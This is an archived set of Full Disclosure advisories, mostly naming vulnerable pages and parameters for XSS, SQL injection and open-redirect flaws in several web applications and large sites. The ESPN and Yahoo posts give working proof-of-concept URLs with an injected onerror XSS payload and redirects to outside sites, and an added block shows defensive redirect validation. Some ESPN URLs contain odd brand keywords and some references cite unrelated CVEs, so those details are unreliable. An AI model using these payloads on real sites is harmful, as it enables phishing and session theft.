various subjects on its topic sites, of which there are nearly 1,000. The
website competes with other online resource sites and encyclopedias,
including those of the Wikimedia Foundation (Wikipedia)

As of May 2013, About.com was receiving about 84 million unique monthly
visitors. (TechCrunch. AOL Inc.)

According to About's online media kit, nearly 1,000 Experts (freelance
writers) contribute to the site by writing on various topics, including
healthcare and travel. (About.com)


*(1.2) Topics Related to About.com*
The Revolutionary About.com Directory and Community Metasite. Hundreds of
real live passionate Guides covering Arts, Entertainment, Business,
Industry, Science, Technology, Culture, Health, Fitness, Games,Travel,
News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms,
Education, Computers, Hobbies and Local Information. (azlist.about.com)

About.com - Sites A to Z
Number of Topics
A: 66
B: 61
C: 118
D: 49
E: 33
F: 57
G: 39
H: 48
I: 32
J: 15
K: 13
L: 36
M: 70
N: 26
O: 23
P: 91
Q: 4
R: 32
S: 104
T: 47
U: 12
V: 9
W: 43
X: 1
Y: 4
Z: 1
SUM: 1039

Reference:
azlist.about.com/

In fact, those are not all of about.com's topics. Some topics are not
listed there, such as
http://specialchildren.about.com

So there are more than 1000 topics related to about.com.


*(1.3) Result of Exploiting XSS Attacks*
Exploited XSS is commonly used to achieve the following malicious results
Identity theft
Accessing sensitive or restricted information
Gaining free access to otherwise paid for content
Spying on user’s web browsing habits
Altering browser functionality
Public defamation of an individual or corporation
Web application defacement
Denial of Service attacks (DoS)
(Acunetix)


*(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities*
In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific
cross-frame-scripting bug in a web browser to access private data on a
third-party website. The attacker induces the browser user to navigate to a
web page the attacker controls; the attacker's page loads a third-party
page in an HTML frame; and then JavaScript executing in the attacker's page
steals data from the third-party page. (OWASP)

XFS also sometimes is used to describe an XSS attack which uses an HTML
frame in the attack. For example, an attacker might exploit a Cross Site
Scripting Flaw to inject a frame into a third-party web page; or an
attacker might create a page which uses a frame to load a third-party page
with an XSS flaw. (OWASP)


*(1.5) Basic of Open Redirect (Dest Redirect Privilege Escalation)
Vulnerabilities*
An open redirect is an application that takes a parameter and redirects a
user to the parameter value without any validation. This 

[FD] CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

2015-01-31 Thread Jing Wang
CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

Exploit Title: SnipSnap /snipsnap-search? query Parameter XSS
Product: SnipSnap
Vulnerable Versions: 0.5.2a  1.0b1  1.0b2
Tested Version: 0.5.2a  1.0b1  1.0b2
Advisory Publication: Jan 30, 2015
Latest Update: Jan 30, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9559
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]


Advisory Details:


(1) Vendor & Product Description

Vendor:
SnipSnap

Product & Version:
SnipSnap
0.5.2a
1.0b1
1.0b2


Vendor URL & Download:
http://snipsnap.org

Product Description:
SnipSnap is a user friendly content management system with features such
as wiki and weblog. 


(2) Vulnerability Details:
SnipSnap has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at snipsnap-search? page with query
parameter.


References:
http://tetraph.com/security/cves/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9559
https://security-tracker.debian.org/tracker/CVE-2014-9559
http://www.cvedetails.com/cve/CVE-2014-9559/
http://www.security-database.com/detail.php?alert=CVE-2014-9559
http://packetstormsecurity.com/files/cve/CVE-2014-9559
http://www.pentest.it/cve-2014-9559.html
http://www.naked-security.com/cve/CVE-2014-9559/
http://007software.net/cve-2014-9559/


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/



[FD] CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerabilities

2015-01-22 Thread Jing Wang
*CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerabilities*

Exploit Title: Smartwebsites SmartCMS v.2 Multiple SQL Injection Security
Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: CVE-2014-9558
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]




*Advisory Details:*


*(1) Vendor & Product Description*

*Vendor:* Smartwebsites

*Product & Version:* SmartCMS v.2

*Vendor URL & Download:*
http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en

*Product Description:*
“SmartCMS is one of the most user friendly and smart content management
systems there is in the Cyprus market. It makes the content management of a
webpage very easy and simple, regardless of the user’s technical skills.”




*(2) Vulnerability Details:*

SmartCMS v.2 has a security vulnerability. It can be exploited by SQL
Injection attacks.

*(2.1)* The first vulnerability occurs at the “index.php?” page with the
“pageid” and “lang” parameters.

*(2.2)* The second vulnerability occurs at the “sitemap.php?” page with the
“pageid” and “lang” parameters.


*References:*
http://www.tetraph.com/security/cves/cve-2014-9558-smartcms-sql-injection-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9558
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9558
https://security-tracker.debian.org/tracker/CVE-2014-9558
http://www.cvedetails.com/cve/CVE-2014-9558/
http://www.security-database.com/detail.php?alert=CVE-2014-9558
http://packetstormsecurity.com/files/cve/CVE-2014-9558
http://www.pentest.it/cve-2014-9558.html
http://www.naked-security.com/cve/CVE-2014-9558/
http://007software.net/cve-2014-9558/


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/


[FD] CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-01-22 Thread Jing Wang
*CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*

Exploit Title: Smartwebsites SmartCMS v.2 Multiple XSS Security
Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9557
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]





*Advisory Details:*


*(1) Vendor & Product Description*

*Vendor:* Smartwebsites

*Product & Version:* SmartCMS v.2

*Vendor URL & Download:*
http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en

*Product Description: *
“SmartCMS is one of the most user friendly and smart content management
systems there is in the Cyprus market. It makes the content management of a
webpage very easy and simple, regardless of the user’s technical skills.”



*(2) Vulnerability Details:*

SmartCMS v.2 has a security problem. It can be exploited by XSS attacks.

*(2.1)* The first vulnerability occurs at the “index.php?” page with the
“pageid” and “lang” parameters.

*(2.2)* The second vulnerability occurs at the “sitemap.php?” page with the
“pageid” and “lang” parameters.


*References:*
http://www.tetraph.com/security/cves/cve-2014-9557-smartcms-multiple-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9557
https://security-tracker.debian.org/tracker/CVE-2014-9557
http://www.cvedetails.com/cve/CVE-2014-9557/
http://www.security-database.com/detail.php?alert=CVE-2014-9557
http://packetstormsecurity.com/files/cve/CVE-2014-9557
http://www.pentest.it/cve-2014-9557.html
http://www.naked-security.com/cve/CVE-2014-9557/
http://007software.net/cve-2014-9557/


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/


[FD] CVE-2014-9560 Softbb.net SoftBB SQL Injection Security Vulnerability

2015-01-10 Thread Jing Wang
*CVE-2014-9560  Softbb.net SoftBB SQL Injection Security Vulnerability*




Exploit Title: Softbb.net SoftBB /redir_last_post_list.php post Parameter
SQL Injection
Product: SoftBB (mods)
Vendor: Softbb.net
Vulnerable Versions: v0.1.3
Tested Version: v0.1.3
Advisory Publication: Jan 10, 2015
Latest Update: Jan 10, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') (CWE-89)
CVE Reference: CVE-2014-9560
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]


*Advisory Details:*


*Vendor URL:*
http://www.softbb.net/



*(2) Vulnerability Details:*
Softbb.net SoftBB can be exploited by SQL Injection attacks.


*(2.1)* The vulnerability occurs at the “/redir_last_post_list.php” page,
with the “post” parameter.




*References:*
http://tetraph.com/security/cves/cve-2014-9560-softbb-net-softbb-sql-injection-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9560
http://www.cvedetails.com/cve/CVE-2006-1327/


--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore


[FD] CVE-2014-9561 Softbb.net SoftBB XSS (Cross-Site Scripting) Security Vulnerability

2015-01-10 Thread Jing Wang
CVE-2014-9561  Softbb.net SoftBB XSS (Cross-Site Scripting) Security
Vulnerability




Exploit Title: Softbb.net SoftBB /redir_last_post_list.php post Parameter
XSS
Product: SoftBB (mods)
Vendor: Softbb.net
Vulnerable Versions: v0.1.3
Tested Version: v0.1.3
Advisory Publication: Jan 10, 2015
Latest Update: Jan 10, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9561
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]


*Advisory Details:*


*Vendor URL:*
http://www.softbb.net/



*(2) Vulnerability Details:*
Softbb.net SoftBB can be exploited by XSS Attacks.


*(2.1)* The vulnerability occurs at the “/redir_last_post_list.php” page,
with the “post” parameter.


*References:*
http://tetraph.com/security/cves/cve-2014-9561-softbb-net-softbb-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9561
http://www.cvedetails.com/cve/CVE-2006-4593/


--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore


[FD] CVE-2014-8752 JCE-Tech Video Niche Script XSS (Cross-Site Scripting) Security Vulnerability

2014-12-18 Thread Jing Wang
*CVE-2014-8752 JCE-Tech Video Niche Script XSS (Cross-Site Scripting)
Security Vulnerability*



Exploit Title: JCE-Tech Video Niche Script /view.php Multiple Parameters
XSS
Product: Video Niche Script
Vendor: JCE-Tech
Vulnerable Versions: 4.0
Tested Version: 4.0
Advisory Publication: Nov 18, 2014
Latest Update: Nov 18, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8752
Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]




*Advisory Details:*


*(1) Vendor URL:*
http://jce-tech.com/products/


*Product Description:*
The PHP Video Script instantly creates a niche video site based on
keywords users control via the admin console. The videos are displayed on
users' sites, but streamed from the YouTube servers.




*(2) Vulnerability Details:*

JCE-Tech Video Niche Script is vulnerable to XSS attacks.


*(2.1)* The vulnerability occurs at the view.php page with the video and
title parameters.





*References:*

http://tetraph.com/security/cves/cve-2014-8752-jce-tech-video-niche-script-xss-cross-site-scripting-security-vulnerability/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8752



[FD] CVE-2014-8490 TennisConnect COMPONENTS System XSS (Cross-Site Scripting) Security Vulnerability

2014-12-18 Thread Jing Wang
*CVE-2014-8490  TennisConnect COMPONENTS System XSS (Cross-Site Scripting)
Security Vulnerability*




Exploit Title: TennisConnect TennisConnect COMPONENTS System /index.cfm
pid Parameter XSS
Product: TennisConnect COMPONENTS System
Vendor: TennisConnect
Vulnerable Versions: 9.927
Tested Version: 9.927
Advisory Publication: Nov 18, 2014
Latest Update: Nov 18, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8490
Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]


*Advisory Details:*


*(1) Vendor URL:*
http://www.tennisconnect.com/products.cfm#Components


*Product Description:*
TennisConnect COMPONENTS
* Contact Manager (online player database)
* Interactive Calendar including online enrollment
* League & Ladder Management through Tencap Tennis
* Group Email (including distribution lists, player reports, unlimited
sending volume and frequency)
* Multi-Administrator / security system with Page Groups
* Member Administration
* MobileBuilder
* Online Tennis Court Scheduler
* Player Matching (Find-a-Game)
* Web Site Builder (hosted web site and editing tools at www. your domain
name .com)




*(2) Vulnerability Details:*

TennisConnect COMPONENTS System is vulnerable to XSS attacks.


*(2.1)* The vulnerability occurs at the /index.cfm? page, with the pid
parameter.


*References:*
http://tetraph.com/security/cves/cve-2014-8490-tennisconnect-components-system-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8490


--
Wang Jing
School of Physical and Mathematical Sciences
Nanyang Technological University, Singapore



[FD] Yahoo Yahoo.com Yahoo.co.jp Open Redirect Security Vulnerabilities

2014-12-18 Thread Jing Wang
*Yahoo Yahoo.com Yahoo.co.jp Open Redirect Security Vulnerabilities*



Though Yahoo lists open redirect vulnerabilities in its bug bounty program,
it seems Yahoo does not take this vulnerability seriously at all.

Multiple Open Redirect vulnerabilities were reported to Yahoo. All of
Yahoo's responses were that this was intended behavior. However, these
vulnerabilities were patched later.

Several other security researchers complained about getting similar
treatment, too.
http://seclists.org/fulldisclosure/2013/Nov/198
http://seclists.org/fulldisclosure/2014/Jan/51
http://seclists.org/fulldisclosure/2014/Feb/119


All Open Redirect Vulnerabilities are intended behavior? If so, why patch
them later?



The vulnerabilities can be exploited without user login. Tests were
performed on Firefox (33.0) in Ubuntu (14.04) and IE (10.0.9200.16521) in
Windows 8.




*(1) Yahoo.com Open Redirect*

*Vulnerable URLs:*
http://p2.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://help.yahoo.com/help/us/local/index.html

http://p3.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com

http://p4.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com



*PoC Video:*
https://www.youtube.com/watch?v=k4eFLsTyZkg

*Another Video Published Before:*
https://www.youtube.com/watch?v=GTd1Gkj6OUY


*Blog:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html
http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html


*(2) Yahoo.co.jp Open Redirect*

One webpage is used for the following tests. Its address is
http://www.inzeed.com/kaleidoscope. Suppose that this webpage is malicious.

*Vulnerable URL:*
http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp

*POC:*
http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope



*PoC Video:*
https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be

*Blog:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html


Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore
http://www.tetraph.com/wangjing


*Blog Details:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html



[FD] CVE-2014-8751 goYWP WebPress Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2014-12-09 Thread Jing Wang
*CVE-2014-8751  goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*


Exploit Title: goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: WebPress
Vendor: goYWP
Vulnerable Versions: 13.00.06
Tested Version: 13.00.06
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8751
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]


*Advisory Details:*

*(1) Product*
WebPress is the foundation on which we build web sites. It’s our unique
Content Management System (CMS), flexible enough for us to build your dream
site, and easy enough for you to maintain it yourself.



*(2) Vulnerability Details:*
goYWP WebPress is vulnerable to XSS attacks.

*(2.1)* The first security vulnerability occurs at the /search.php page
with the search_param parameter in HTTP GET.

*(2.2)* The second security vulnerability occurs at the /forms.php (form
submission) page with the name, address and comment parameters in HTTP
POST.


*References:*
http://tetraph.com/security/cves/cve-2014-8751-goywp-webpress-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://www.goywp.com/view/cms
http://www.goywp.com/demo.php
http://cwe.mitre.org
http://cve.mitre.org/


[FD] CVE-2014-8489 Ping Identity Corporation PingFederate 6.10.1 SP Endpoints Dest Redirect Privilege Escalation Security Vulnerability

2014-12-09 Thread Jing Wang
*CVE-2014-8489 Ping Identity Corporation PingFederate 6.10.1 SP Endpoints
Dest Redirect Privilege Escalation Security Vulnerability*


Exploit Title: Ping Identity Corporation PingFederate 6.10.1 SP
Endpoints Dest Redirect Privilege Escalation Security Vulnerability
Product: PingFederate 6.10.1 SP Endpoints
Vendor: Ping Identity Corporation
Vulnerable Versions: 6.10.1
Tested Version: 6.10.1
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]
CVE Reference: CVE-2014-8489
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]


*Advisory Details*



*(1) Product:*
PingFederate is a best-of-breed Internet-identity security platform that
implements multiple standards-based protocols to provide cross-domain
single sign-on (SSO) and user-attribute exchange, as well as support for
identity-enabled Web Services and cross-domain user provisioning.




*(2) Vulnerability Details:*
PingFederate 6.10.1 SP Endpoints is vulnerable to Dest Redirect Privilege
Escalation attacks.

The security vulnerability occurs at the /startSSO.ping? page with the
TargetResource parameter.


*References:*
http://tetraph.com/security/cves/cve-2014-8489-ping-identity-corporation-pingfederate-6-10-1-sp-endpoints-dest-redirect-privilege-escalation-security-vulnerability/
http://documentation.pingidentity.com/display/PF610/PingFederate+6.10
http://cwe.mitre.org
http://cve.mitre.org/


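The Yahoo post above carries the redirect target as a path suffix after `/*`, and the PingFederate post carries it in the TargetResource query parameter; either way the server follows a client-supplied URL without checking it, which is the whole of the open-redirect (Dest Redirect) class. The block below is an added example, not Yahoo's, Ping Identity's or any other vendor's code and not part of any post on this page. It shows the check a redirect endpoint should apply before emitting a 302, using the WHATWG URL parser built into Node and browsers; the site origin, the allow-listed hostnames and the sample targets are assumptions for illustration.

```javascript
// Added example, not Yahoo's, Ping Identity's or any other vendor's code:
// validating a client-supplied redirect target before sending a 302 to it.
// The target may arrive as a query parameter (TargetResource, redirect,
// appRedirect) or as a path suffix like the "/*http://..." form in the Yahoo
// report; the decision is the same. Origin and host list are assumptions.

const SITE_ORIGIN = 'https://sso.example.com';
// Exact hostnames we are willing to send users to; a real service would load
// this from configuration rather than hard-code it.
const ALLOWED_HOSTS = new Set(['sso.example.com', 'www.example.com', 'shop.example.com']);

// Returns the absolute URL to redirect to, or null if the target must be refused.
function resolveRedirect(target) {
  if (typeof target !== 'string' || target.length === 0 || target.length > 2048) {
    return null;
  }
  let url;
  try {
    // Resolving against our own origin keeps relative paths ("/account")
    // working while the parser normalises the usual bypasses:
    //   "//evil.example"                        scheme-relative
    //   "/\\evil.example"                       backslash is a slash for http(s)
    //   "https://www.example.com@evil.example"  userinfo before the real host
    url = new URL(target, SITE_ORIGIN);
  } catch (_) {
    return null; // unparseable
  }
  // Only http(s). "javascript:" and "data:" parse without error but must
  // never become the Location header of a redirect.
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  // Compare the parsed hostname for exact membership, never as a prefix or
  // suffix: "www.example.com.evil.example" and "wwwexample.com" fail here.
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;
  // Embedded credentials have no legitimate use in a redirect target.
  if (url.username !== '' || url.password !== '') return null;
  return url.href;
}

// What the handler actually puts in the Location header: the validated target
// or the site's own landing page.
function redirectLocation(target) {
  const ok = resolveRedirect(target);
  return ok === null ? SITE_ORIGIN + '/' : ok;
}

// Constructed inputs in the shapes seen in open-redirect reports.
const SAMPLES = [
  '/account/settings',
  'https://shop.example.com/cart?item=42',
  '//evil.example/',
  '/\\evil.example/',
  'https://www.example.com@evil.example/',
  'https://www.example.com.evil.example/',
  'javascript:alert(document.domain)',
  'https://user:pw@shop.example.com/',
];

// Pairs each sample with the decision, so the bypass attempts can be inspected.
function classify() {
  return SAMPLES.map((t) => [t, resolveRedirect(t)]);
}
```

`classify()` accepts only the first two samples. The important design choice is to parse first and compare the resulting hostname exactly; substring or regex checks on the raw string are what the scheme-relative, backslash and userinfo variants are built to slip past. Where an endpoint must legitimately send users to arbitrary third parties (an affiliate gateway, for instance), the remaining option is to sign the target server-side when the link is generated and verify the signature here, rather than trusting whatever arrives in the request.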

[FD] ESPN espn.go.com Login Register Page XSS and Dest Redirect Privilege Escalation Security Vulnerabilities

2014-12-09 Thread Jing Wang
*ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege
Escalation Security Vulnerabilities*


*Domain:*
http://espn.go.com/


"As of August 2013, ESPN is available to approximately 97,736,000 pay
television households (85.58% of households with at least one television
set) in the United States. In addition to the flagship channel and its seven
related channels in the United States, ESPN broadcasts in more than 200
countries, operating regional channels in Australia, Brasil, Latin America
and the United Kingdom, and owning a 20% interest in The Sports Network
(TSN) as well as its five sister networks and NHL Network in Canada."
(Wikipedia)






*Vulnerability description:*

Espn.go.com has a security problem. It is vulnerable to XSS (Cross Site
Scripting) and Dest Redirect Privilege Escalation (Open Redirect) attacks.

Those vulnerabilities are very dangerous, since they happen at ESPN's
login & register pages, which are credible. Attackers can abuse those
links to mislead ESPN's users. The success rate of attacks may be high.

During the tests, besides the links given above, a large number of ESPN's
links are vulnerable to those attacks.


The vulnerability occurs at espn.go.com's login? & register pages
with the redirect parameter, i.e.
http://streak.espn.go.com/en/login?redirect=
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=
https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/


Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0.7601)
in Windows 8.






*(1) XSS Vulnerability*

*Vulnerable URLs:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPagelanguage=enaffiliateName=espnregFormId=reddit
https://register.go.com/go/sendMemberNames?aff_code=goappRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459;img
src=x onerror=prompt('justqdjing')
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPagelanguage=enaffiliateName=espnregFormId=espn;img
src=x onerror=prompt('justqdjing')
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate;img
src=x onerror=prompt('justqdjing')
https://register.go.com/go/sendMemberNames?aff_code=goappRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login;img
src=x onerror=prompt('justqdjing')




*Poc Video:*
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss.html
http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html




*(2) Dest Redirect Privilege Escalation Vulnerability*

One webpage is used for the following tests. The webpage address is
"http://www.diebiyi.com/". Suppose that this webpage is malicious.


*(2.1) Login Page Dest Redirect Privilege Escalation Vulnerability*

*Vulnerable URL 1:*
https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

*POC:*
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com


*Vulnerable URL 2:*
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828

*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com



*(2.2) Vulnerabilities Attacked without User Login*

*Vulnerable URL 1:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoaurl=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112

[FD] CVE-2014-7291 Springshare LibCal XSS (Cross-Site Scripting) Vulnerability

2014-11-26 Thread Jing Wang
*Exploit Title: Springshare LibCal XSS (Cross-Site Scripting) Vulnerability*

Product: LibCal

Vendor: Springshare

Vulnerable Versions: 2.0

Tested Version: 2.0

Advisory Publication: Nov 25, 2014

Latest Update: Nov 25, 2014

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2014-7291

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Solution Status: Fixed by Vendor

Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details*



*(1) Product:*

Springshare LibCal is an easy-to-use calendaring and event management
platform for libraries, used by 1,600+ libraries worldwide.



*(2) Vulnerability Details:*

The XSS vulnerabilities occur at the /api_events.php? page, with the m and
cid parameters.



*(3) Solutions:*

2014-10-01: Report vulnerability to Vendor

2014-10-15: Vendor replied with thanks and vendor changed the source code









*References:*

http://tetraph.com/security/cves/cve-2014-7291-springshare-libcal-xss-cross-site-scripting-vulnerability/

http://www.springshare.com/libcal/

http://cwe.mitre.org

http://cve.mitre.org/



[FD] CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege Escalation

2014-11-26 Thread Jing Wang

*CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege
Escalation*





Exploit Title: WordPress Ad-Manager Plugin Dest Redirect Privilege
Escalation Vulnerability

Product: WordPress Ad-Manager Plugin

Vendor: CodeCanyon

Vulnerable Versions: 1.1.2

Tested Version: 1.1.2

Advisory Publication: Nov 25, 2014

Latest Update: Nov 25, 2014

Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]

CVE Reference: CVE-2014-8754

CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)

Impact Subscore: 4.9

Exploitability Subscore: 8.6

Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details*



*(1) Product:*

“WordPress Ad-Manager offers users a simple solution to implement
advertising into their posts, their blog or any other WordPress page. Users
can use pictures and images or HTML snippets like Google AdSense to
incorporate advertising in an easy way.”



*(2) Vulnerability Details:*

The Dest Redirect Privilege Escalation vulnerability occurs at the
“track-click.php” page with the “out” parameter.






*References:*

http://tetraph.com/security/cves/cve-2014-8754-wordpress-ad-manager-plugin-dest-redirect-privilege-escalation/

http://codecanyon.net/item/wordpress-admanager/544421

https://wordpress.org/plugins/ad-manager-for-wp/

http://cwe.mitre.org

http://cve.mitre.org/


[FD] All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (cross site scripting) Attacks

2014-11-26 Thread Jing Wang
*All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to
XSS (cross site scripting) Attacks*




*Domain Description:*

http://www.indiatimes.com


